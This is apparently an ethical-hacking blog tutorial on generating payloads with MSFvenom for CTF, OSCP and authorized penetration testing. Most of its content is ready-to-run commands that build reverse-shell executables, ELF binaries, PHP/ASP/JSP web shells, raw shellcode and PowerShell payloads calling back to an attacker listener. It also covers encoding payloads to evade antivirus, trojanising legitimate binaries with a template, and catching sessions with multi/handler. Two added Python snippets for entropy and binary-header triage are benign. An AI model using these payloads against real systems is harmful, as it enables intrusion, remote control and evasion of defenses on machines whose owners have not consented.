Ethical Hacking  #msfvenom #metasploit #payloads

MSFvenom Payload Generation: Complete Guide

Learn how to use MSFvenom to generate reverse shells, encode payloads, and choose output formats like exe, elf, and raw for penetration testing.


MSFvenom Payload Generation: A Complete Practical Guide

MSFvenom is the go-to payload generation tool in the Metasploit Framework. It merges two older tools — msfpayload and msfencode — into a single, powerful utility that lets you craft shellcode, executables, and scripts for virtually any target platform. Whether you are preparing for a CTF, running an authorized red-team engagement, or studying for your OSCP, understanding MSFvenom is essential.

Legal notice: Only use MSFvenom against systems you own or have explicit written permission to test. Unauthorized use is illegal.

Understanding the MSFvenom Workflow

MSFvenom works in three conceptual steps:

  1. Select a payload — what happens on the target after execution (e.g., open a shell)
  2. Choose a format — how the payload is packaged (exe, elf, python, raw, etc.)
  3. Optionally encode — obfuscate the payload to bypass signature-based detection

The basic syntax is:

msfvenom -p <payload> [options] -f <format> -o <output_file>

Listing Available Payloads

Before generating anything, explore what is available:

# List all payloads
msfvenom --list payloads

# Filter by platform
msfvenom --list payloads | grep windows/x64

# List encoders
msfvenom --list encoders

# List output formats
msfvenom --list formats

Key payload naming conventions:

Pattern                         | Meaning
--------------------------------|---------------------------------------
windows/meterpreter/reverse_tcp | Staged, Windows, Meterpreter shell
windows/meterpreter_reverse_tcp | Stageless, Windows, Meterpreter shell
linux/x86/shell_reverse_tcp     | Stageless, Linux 32-bit, plain shell
php/meterpreter_reverse_tcp     | PHP Meterpreter (stageless)

Staged vs. Stageless: Staged payloads (forward slash between shell type and transport) are smaller — they download the main payload from your listener at runtime. Stageless payloads embed everything upfront. Use stageless when you cannot guarantee a stable connection back to your listener during staging.

Generating a Windows Reverse Shell (EXE)

The most common use case: a Windows executable that calls back to your machine.

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 \
  LPORT=4444 \
  -f exe \
  -o shell.exe

Key flags:

  • -p — payload module path
  • LHOST — your listener IP (use tun0 interface IP on VPN-based labs)
  • LPORT — listener port
  • -f exe — output format
  • -o — output filename

Generating a Linux ELF Payload

msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=10.10.14.5 \
  LPORT=9001 \
  -f elf \
  -o shell.elf

chmod +x shell.elf

ELF binaries work on Linux and most Unix-like systems. After transferring to the target, mark as executable before running.

Web Payloads: PHP, ASP, JSP

When you have a file upload vulnerability, web shell payloads are invaluable:

# PHP — works on most Linux web servers
msfvenom -p php/meterpreter_reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f raw \
  -o shell.php

# ASP — Windows/IIS targets
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f asp \
  -o shell.asp

# JSP — Java application servers (Tomcat, JBoss)
msfvenom -p java/jsp_shell_reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -f raw \
  -o shell.jsp

Generating Raw Shellcode

Raw shellcode is useful when injecting into another program or embedding in a custom dropper:

# C-style shellcode array
msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=443 \
  -f c

# Python bytes object
msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=443 \
  -f python

The -f c output can be pasted directly into a C shellcode runner for process injection exercises.

Encoding Payloads

Encoders transform shellcode to help evade simple signature detection. Note that modern EDR solutions use behavioral analysis, so encoding alone is rarely sufficient against enterprise defenses — but it still matters for older AV and CTF scenarios.

# Single encoding pass with shikata_ga_nai (x86 only)
msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -e x86/shikata_ga_nai \
  -i 5 \
  -f exe \
  -o encoded_shell.exe

  • -e x86/shikata_ga_nai — the encoder (polymorphic XOR additive feedback)
  • -i 5 — five encoding iterations

For x64 payloads, use x64/xor_dynamic or x64/zutto_dekiru instead.

Checking Bad Characters

When exploiting buffer overflows, certain bytes break the shellcode (e.g., \x00 null bytes). Generate a payload while excluding them:

msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -b "\x00\x0a\x0d" \
  -f c

The -b flag lists bad characters to avoid. MSFvenom automatically selects an appropriate encoder.
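The -f python output above and the -b exclusion list are easy to check by hand only for tiny blobs. The following added example (not from the original post or from the Metasploit project) parses text in the shape that -f python emits, reports the byte count, the Shannon entropy (a rough indicator of whether a blob has been encoded, and the same measurement a responder applies to a recovered script) and any bytes that appear in a bad-character list. The SAMPLE_OUTPUT string is constructed for the example and does not contain real shellcode; the function names are this example's own.

```python
import math
import re

# Constructed stand-in for `msfvenom ... -f python` output. The bytes are
# arbitrary filler chosen to exercise the parser, not real shellcode.
SAMPLE_OUTPUT = r'''buf =  b""
buf += b"\x48\x31\xc0\x90\x90\xe8\x00\x00\x00\x00"
buf += b"\x0a\x0d\x41\x42"
'''

# One line of the python format: `buf = b""` or `buf += b"\x.."`. Older
# msfvenom versions omit the `b` prefix, so it is optional here.
_LINE_RE = re.compile(r'^buf\s*\+?=\s*b?"((?:\\x[0-9a-fA-F]{2})*)"$')


def parse_python_format(text):
    """Collect the escaped bytes from every `buf += ...` line into one bytes object."""
    out = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = _LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised line: {line!r}")
        out += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(out)


def shannon_entropy(data):
    """Bits of entropy per byte (0.0 for empty input, at most 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def find_bad_chars(data, bad_chars):
    """Return (offset, byte) for every occurrence of a byte from bad_chars."""
    bad = set(bad_chars)
    return [(i, b) for i, b in enumerate(data) if b in bad]


def summarize(text, bad_chars=b"\x00\x0a\x0d"):
    """Length, entropy and bad-character hits for one -f python blob."""
    data = parse_python_format(text)
    return {
        "length": len(data),
        "entropy": round(shannon_entropy(data), 3),
        "bad_chars": find_bad_chars(data, bad_chars),
    }


if __name__ == "__main__":
    # With the constructed sample: 14 bytes, six bad-character hits
    # (four nulls, one 0x0a, one 0x0d), entropy roughly 3.09 bits/byte.
    print(summarize(SAMPLE_OUTPUT))
```

Feed the function the text saved from a real -f python run (or the bytes extracted from a recovered dropper) and an empty bad_chars list means the -b exclusions held; a blob encoded with several iterations will sit close to 8 bits/byte, which is why entropy is a common triage heuristic for packed or encoded content.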

Setting Up the multi/handler Listener

A payload is useless without a listener. In msfconsole:

msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run -j

ExitOnSession false keeps the handler alive to catch multiple connections. -j runs it as a background job so you can continue using the console.

Catching Multiple Session Types

The multi/handler works with almost any payload — just match the payload setting to what you generated with MSFvenom. For a plain netcat-style shell:

set payload generic/shell_reverse_tcp

PowerShell Payloads for Windows

When you need to execute in-memory on Windows without dropping an exe:

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=443 \
  -f psh-reflection \
  -o shell.ps1

Deliver via: powershell -ep bypass -f shell.ps1

Quick Reference Table

Target OS       | Format | Payload Example
----------------|--------|------------------------------------
Windows 64-bit  | exe    | windows/x64/meterpreter/reverse_tcp
Linux 64-bit    | elf    | linux/x64/shell_reverse_tcp
PHP web app     | raw    | php/meterpreter_reverse_tcp
ASP.NET / IIS   | aspx   | windows/meterpreter/reverse_tcp
Java app server | raw    | java/jsp_shell_reverse_tcp
Android         | apk    | android/meterpreter/reverse_tcp
macOS           | macho  | osx/x64/shell_reverse_tcp

Troubleshooting Common Issues

“No platform was selected” warning — add -p with a fully qualified payload path including the OS prefix.

Handler catches connection then immediately dies — payload architecture mismatch. Verify whether the target is 32-bit or 64-bit and use the matching payload.
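The architecture mismatch above is simplest to rule out by reading the headers of the file you generated (or, from the other side of the table, of a file recovered during an incident) rather than guessing from the filename. The added example below is not from the original post or from Metasploit: it inspects the first bytes of a PE or ELF image, returns the format, the machine type and the 32/64-bit class, and builds tiny constructed header stubs so it runs offline. The machine-type constants are the public PE/COFF and ELF values; the builder and check functions are this example's own names.

```python
import struct

# IMAGE_FILE_MACHINE_* values from the PE/COFF specification.
PE_MACHINES = {0x014C: "x86", 0x8664: "x64", 0x01C0: "arm", 0x01C4: "arm", 0xAA64: "arm64"}
# e_machine values from the ELF specification.
ELF_MACHINES = {0x03: "x86", 0x3E: "x64", 0x28: "arm", 0xB7: "arm64"}


def identify_binary(data):
    """Return (format, arch, bits) for a PE or ELF image; raise ValueError otherwise.

    Only the headers are read, so the first few hundred bytes of a file suffice.
    """
    if data[:4] == b"\x7fELF":
        ei_class, ei_data = data[4], data[5]        # 1 = 32-bit/LE, 2 = 64-bit/BE
        endian = "<" if ei_data == 1 else ">"
        (e_machine,) = struct.unpack_from(endian + "H", data, 18)
        bits = {1: "32-bit", 2: "64-bit"}.get(ei_class, "unknown class")
        return "elf", ELF_MACHINES.get(e_machine, f"unknown(0x{e_machine:x})"), bits
    if data[:2] == b"MZ":
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)   # offset of "PE\0\0"
        if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
            raise ValueError("MZ header without a PE signature")
        (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
        # COFF header is 20 bytes; the optional header starts right after it
        # and opens with the PE32 (0x10B) / PE32+ (0x20B) magic.
        (magic,) = struct.unpack_from("<H", data, e_lfanew + 24)
        bits = {0x10B: "32-bit", 0x20B: "64-bit"}.get(magic, "unknown magic")
        return "pe", PE_MACHINES.get(machine, f"unknown(0x{machine:x})"), bits
    raise ValueError("not a PE or ELF image")


def matches_target(data, target_arch):
    """True when the image's machine type equals the architecture you expect on the target."""
    return identify_binary(data)[1] == target_arch


# Constructed header stubs (headers only, no code) so the checks run offline.
def build_sample_pe(machine, magic):
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\x00\x00" + struct.pack("<H", machine) + bytes(18)
    return dos + coff + struct.pack("<H", magic) + bytes(30)


def build_sample_elf(ei_class, e_machine):
    ident = b"\x7fELF" + bytes([ei_class, 1, 1]) + bytes(9)      # 16-byte e_ident, LE
    return ident + struct.pack("<HH", 2, e_machine) + bytes(44)  # e_type=EXEC, e_machine


if __name__ == "__main__":
    for name, blob in [("pe x64", build_sample_pe(0x8664, 0x20B)),
                       ("pe x86", build_sample_pe(0x014C, 0x10B)),
                       ("elf x64", build_sample_elf(2, 0x3E)),
                       ("elf x86", build_sample_elf(1, 0x03))]:
        print(name, identify_binary(blob))
```

On a real file, read the first 4 KiB with open(path, "rb") and pass it to identify_binary; if the result disagrees with what you set the handler's payload to, that is the mismatch the handler is complaining about. The same check is a quick triage step for a responder deciding which sandbox or analysis toolchain a recovered sample needs.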

AV deletes the file immediately — try encoding, change the output format, or embed in a legitimate binary template with -x <template.exe> and -k to keep the template functionality.

Payload too large — switch to a staged payload (the / variant) which only sends a small stub initially.

Summary

MSFvenom is a flexible, platform-agnostic payload factory. The key workflow is: pick a payload matching your target OS and architecture, set LHOST/LPORT to your listener, choose a delivery format, optionally encode to reduce detection, and catch the callback with multi/handler. Mastering these fundamentals opens the door to more advanced post-exploitation work with Meterpreter modules, pivoting, and lateral movement.

#penetration-testing #reverse-shell #payloads #metasploit #msfvenom